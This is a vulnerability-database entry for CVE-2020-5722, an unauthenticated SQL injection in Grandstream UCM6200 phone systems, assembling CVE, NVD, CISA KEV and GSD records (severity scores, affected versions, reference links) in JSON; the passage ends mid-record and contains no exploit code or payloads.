CVE-2020-5722 (GCVE-0-2020-5722)

Vulnerability from cvelistv5 – Published: 2020-03-23 19:31 – Updated: 2025-10-21 23:35

CISA KEV

Summary

Severity ?

9.8 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE

SQL Injection, HTML Injection

Assigner

tenable

References

URL

	Vendor	Product	Version
	n/a	Grandstream UCM6200 Series	Affected: Before 1.0.20.17

CISA KEV

Known Exploited Vulnerability - GCVE BCP-07 Compliant

KEV entry ID: db68b2cb-d879-483f-b6a1-a86f164aa087

Vulnerability ID: CVE-2020-5722

Status: Confirmed

Status Updated: 2022-01-28 00:00 UTC

Exploited: Yes

Timestamps

First Seen: 2022-01-28

Asserted: 2022-01-28

Scope

Notes: KEV entry: Grandstream Networks UCM6200 Series SQL Injection Vulnerability | Affected: Grandstream / UCM6200 | Description: Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. Exploitation can allow for code execution as root. | Required action: Apply updates per vendor instructions. | Due date: 2022-07-28 | Known ransomware campaign use (KEV): Unknown | Notes (KEV): https://nvd.nist.gov/vuln/detail/CVE-2020-5722

Evidence

Type: Vendor Report

Signal: Successful Exploitation

Confidence: 80%

Source: cisa-kev

Details

Cwes	CWE-89
Feed	CISA Known Exploited Vulnerabilities Catalog
Product	UCM6200
Due Date	2022-07-28
Date Added	2022-01-28
Vendorproject	Grandstream
Vulnerabilityname	Grandstream Networks UCM6200 Series SQL Injection Vulnerability
Knownransomwarecampaignuse	Unknown

References

CVE-2020-5722

Created: 2026-02-02 12:28 UTC | Updated: 2026-02-06 07:17 UTC

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T08:39:25.626Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.tenable.com/security/research/tra-2020-15"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "HIGH",
              "baseScore": 9.8,
              "baseSeverity": "CRITICAL",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "NONE",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2020-5722",
                "options": [
                  {
                    "Exploitation": "active"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-02-06T20:27:25.790617Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "other": {
              "content": {
                "dateAdded": "2022-01-28",
                "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5722"
              },
              "type": "kev"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-89",
                "description": "CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-10-21T23:35:47.400Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "government-resource"
            ],
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5722"
          }
        ],
        "timeline": [
          {
            "lang": "en",
            "time": "2022-01-28T00:00:00+00:00",
            "value": "CVE-2020-5722 added to CISA KEV"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Grandstream UCM6200 Series",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "Before 1.0.20.17"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "SQL Injection, HTML Injection",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-01-25T17:06:17.000Z",
        "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be",
        "shortName": "tenable"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.tenable.com/security/research/tra-2020-15"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "vulnreport@tenable.com",
          "ID": "CVE-2020-5722",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Grandstream UCM6200 Series",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "Before 1.0.20.17"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "SQL Injection, HTML Injection"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.tenable.com/security/research/tra-2020-15",
              "refsource": "MISC",
              "url": "https://www.tenable.com/security/research/tra-2020-15"
            },
            {
              "name": "http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html"
            },
            {
              "name": "http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be",
    "assignerShortName": "tenable",
    "cveId": "CVE-2020-5722",
    "datePublished": "2020-03-23T19:31:40.000Z",
    "dateReserved": "2020-01-06T00:00:00.000Z",
    "dateUpdated": "2025-10-21T23:35:47.400Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "cisa_known_exploited": {
      "cveID": "CVE-2020-5722",
      "cwes": "[\"CWE-89\"]",
      "dateAdded": "2022-01-28",
      "dueDate": "2022-07-28",
      "knownRansomwareCampaignUse": "Unknown",
      "notes": "https://nvd.nist.gov/vuln/detail/CVE-2020-5722",
      "product": "UCM6200",
      "requiredAction": "Apply updates per vendor instructions.",
      "shortDescription": "Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. Exploitation can allow for code execution as root.",
      "vendorProject": "Grandstream",
      "vulnerabilityName": "Grandstream Networks UCM6200 Series SQL Injection Vulnerability"
    },
    "fkie_nvd": {
      "cisaActionDue": "2022-07-28",
      "cisaExploitAdd": "2022-01-28",
      "cisaRequiredAction": "Apply updates per vendor instructions.",
      "cisaVulnerabilityName": "Grandstream Networks UCM6200 Series SQL Injection Vulnerability",
      "configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:grandstream:ucm6200_firmware:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"1.0.19.20\", \"matchCriteriaId\": \"98FF035C-153C-497E-B889-6C7D836769EA\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:grandstream:ucm6200:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"F9F3E859-0FC6-44E6-909E-4312CBA03032\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.\"}, {\"lang\": \"es\", \"value\": \"La interfaz HTTP de la serie Grandstream UCM6200 es vulnerable a una inyecci\\u00f3n SQL remota no autenticada por medio de una petici\\u00f3n HTTP dise\\u00f1ada. Un atacante puede usar esta vulnerabilidad para ejecutar comandos de shell como root en versiones anteriores a 1.0.19.20 o inyectar HTML en correos electr\\u00f3nicos de recuperaci\\u00f3n de contrase\\u00f1a en versiones anteriores a 1.0.20.17.\"}]",
      "id": "CVE-2020-5722",
      "lastModified": "2024-11-21T05:34:29.097",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:N/C:C/I:C/A:C\", \"baseScore\": 10.0, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"NONE\", \"confidentialityImpact\": \"COMPLETE\", \"integrityImpact\": \"COMPLETE\", \"availabilityImpact\": \"COMPLETE\"}, \"baseSeverity\": \"HIGH\", \"exploitabilityScore\": 10.0, \"impactScore\": 10.0, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2020-03-23T20:15:12.043",
      "references": "[{\"url\": \"http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html\", \"source\": \"vulnreport@tenable.com\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html\", \"source\": \"vulnreport@tenable.com\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://www.tenable.com/security/research/tra-2020-15\", \"source\": \"vulnreport@tenable.com\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\", \"VDB Entry\"]}, {\"url\": \"https://www.tenable.com/security/research/tra-2020-15\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}]",
      "sourceIdentifier": "vulnreport@tenable.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-89\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2020-5722\",\"sourceIdentifier\":\"vulnreport@tenable.com\",\"published\":\"2020-03-23T20:15:12.043\",\"lastModified\":\"2025-10-31T22:11:59.510\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.\"},{\"lang\":\"es\",\"value\":\"La interfaz HTTP de la serie Grandstream UCM6200 es vulnerable a una inyecci\u00f3n SQL remota no autenticada por medio de una petici\u00f3n HTTP dise\u00f1ada. Un atacante puede usar esta vulnerabilidad para ejecutar comandos de shell como root en versiones anteriores a 1.0.19.20 o inyectar HTML en correos electr\u00f3nicos de recuperaci\u00f3n de contrase\u00f1a en versiones anteriores a 1.0.20.17.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9},{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:N/C:C/I:C/A:C\",\"baseScore\":10.0,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"NONE\",\"confidentialityImpact\":\"COMPLETE\",\"integrityImpact\":\"COMPLETE\",\"availabilityImpact\":\"COMPLETE\"},\"baseSeverity\":\"HIGH\",\"exploitabilityScore\":10.0,\"impactScore\":10.0,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"cisaExploitAdd\":\"2022-01-28\",\"cisaActionDue\":\"2022-07-28\",\"cisaRequiredAction\":\"Apply updates per vendor instructions.\",\"cisaVulnerabilityName\":\"Grandstream Networks UCM6200 Series SQL Injection Vulnerability\",\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]},{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:grandstream:ucm6200_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.0.19.20\",\"matchCriteriaId\":\"98FF035C-153C-497E-B889-6C7D836769EA\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:grandstream:ucm6200:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"F9F3E859-0FC6-44E6-909E-4312CBA03032\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html\",\"source\":\"vulnreport@tenable.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html\",\"source\":\"vulnreport@tenable.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.tenable.com/security/research/tra-2020-15\",\"source\":\"vulnreport@tenable.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\",\"VDB Entry\"]},{\"url\":\"https://www.tenable.com/security/research/tra-2020-15\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5722\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"US Government Resource\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"affected\": [{\"product\": \"Grandstream UCM6200 Series\", \"vendor\": \"n/a\", \"versions\": [{\"status\": \"affected\", \"version\": \"Before 1.0.20.17\"}]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.\"}], \"problemTypes\": [{\"descriptions\": [{\"description\": \"SQL Injection, HTML Injection\", \"lang\": \"en\", \"type\": \"text\"}]}], \"providerMetadata\": {\"dateUpdated\": \"2022-01-25T17:06:17.000Z\", \"orgId\": \"5ac1ecc2-367a-4d16-a0b2-35d495ddd0be\", \"shortName\": \"tenable\"}, \"references\": [{\"tags\": [\"x_refsource_MISC\"], \"url\": \"https://www.tenable.com/security/research/tra-2020-15\"}, {\"tags\": [\"x_refsource_MISC\"], \"url\": \"http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html\"}, {\"tags\": [\"x_refsource_MISC\"], \"url\": \"http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html\"}], \"x_legacyV4Record\": {\"CVE_data_meta\": {\"ASSIGNER\": \"vulnreport@tenable.com\", \"ID\": \"CVE-2020-5722\", \"STATE\": \"PUBLIC\"}, \"affects\": {\"vendor\": {\"vendor_data\": [{\"product\": {\"product_data\": [{\"product_name\": \"Grandstream UCM6200 Series\", \"version\": {\"version_data\": [{\"version_value\": \"Before 1.0.20.17\"}]}}]}, \"vendor_name\": \"n/a\"}]}}, \"data_format\": \"MITRE\", \"data_type\": \"CVE\", \"data_version\": \"4.0\", \"description\": {\"description_data\": [{\"lang\": \"eng\", \"value\": \"The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.\"}]}, \"problemtype\": {\"problemtype_data\": [{\"description\": [{\"lang\": \"eng\", \"value\": \"SQL Injection, HTML Injection\"}]}]}, \"references\": {\"reference_data\": [{\"name\": \"https://www.tenable.com/security/research/tra-2020-15\", \"refsource\": \"MISC\", \"url\": \"https://www.tenable.com/security/research/tra-2020-15\"}, {\"name\": \"http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html\", \"refsource\": \"MISC\", \"url\": \"http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html\"}, {\"name\": \"http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html\", \"refsource\": \"MISC\", \"url\": \"http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html\"}]}}}, \"adp\": [{\"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-04T08:39:25.626Z\"}, \"title\": \"CVE Program Container\", \"references\": [{\"tags\": [\"x_refsource_MISC\", \"x_transferred\"], \"url\": \"https://www.tenable.com/security/research/tra-2020-15\"}, {\"tags\": [\"x_refsource_MISC\", \"x_transferred\"], \"url\": \"http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html\"}, {\"tags\": [\"x_refsource_MISC\", \"x_transferred\"], \"url\": \"http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html\"}]}, {\"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 9.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}, {\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2020-5722\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"active\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-02-06T20:27:25.790617Z\"}}}, {\"other\": {\"type\": \"kev\", \"content\": {\"dateAdded\": \"2022-01-28\", \"reference\": \"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5722\"}}}], \"references\": [{\"url\": \"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-5722\", \"tags\": [\"government-resource\"]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-89\", \"description\": \"CWE-89 Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-02-06T20:26:45.556Z\"}, \"timeline\": [{\"time\": \"2022-01-28T00:00:00+00:00\", \"lang\": \"en\", \"value\": \"CVE-2020-5722 added to CISA KEV\"}], \"title\": \"CISA ADP Vulnrichment\"}]}",
      "cveMetadata": "{\"assignerOrgId\": \"5ac1ecc2-367a-4d16-a0b2-35d495ddd0be\", \"assignerShortName\": \"tenable\", \"cveId\": \"CVE-2020-5722\", \"datePublished\": \"2020-03-23T19:31:40.000Z\", \"dateReserved\": \"2020-01-06T00:00:00.000Z\", \"dateUpdated\": \"2025-10-21T19:54:35.318Z\", \"state\": \"PUBLISHED\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

GSD-2020-5722

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2020-5722

Aliases

CVE-2020-5722

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2020-5722",
    "description": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.",
    "id": "GSD-2020-5722",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2020-5722"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2020-5722"
      ],
      "details": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17.",
      "id": "GSD-2020-5722",
      "modified": "2023-12-13T01:22:03.655227Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cisa.gov": {
      "cveID": "CVE-2020-5722",
      "dateAdded": "2022-01-28",
      "dueDate": "2022-07-28",
      "product": "UCM6200",
      "requiredAction": "Apply updates per vendor instructions.",
      "shortDescription": "Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. Exploitation can allow for code execution as root.",
      "vendorProject": "Grandstream",
      "vulnerabilityName": "Grandstream Networks UCM6200 Series SQL Injection Vulnerability"
    },
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "vulnreport@tenable.com",
        "ID": "CVE-2020-5722",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "Grandstream UCM6200 Series",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "Before 1.0.20.17"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "SQL Injection, HTML Injection"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://www.tenable.com/security/research/tra-2020-15",
            "refsource": "MISC",
            "url": "https://www.tenable.com/security/research/tra-2020-15"
          },
          {
            "name": "http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/156876/UCM6202-1.0.18.13-Remote-Command-Injection.html"
          },
          {
            "name": "http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html",
            "refsource": "MISC",
            "url": "http://packetstormsecurity.com/files/165708/Grandstream-UCM62xx-IP-PBX-sendPasswordEmail-Remote-Code-Execution.html"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:grandstream:ucm6200_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndExcluding": "1.0.19.20",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:grandstream:ucm6200:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "vulnreport@tenable.com",
          "ID": "CVE-2020-5722"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-89"
                }
              ]
            }
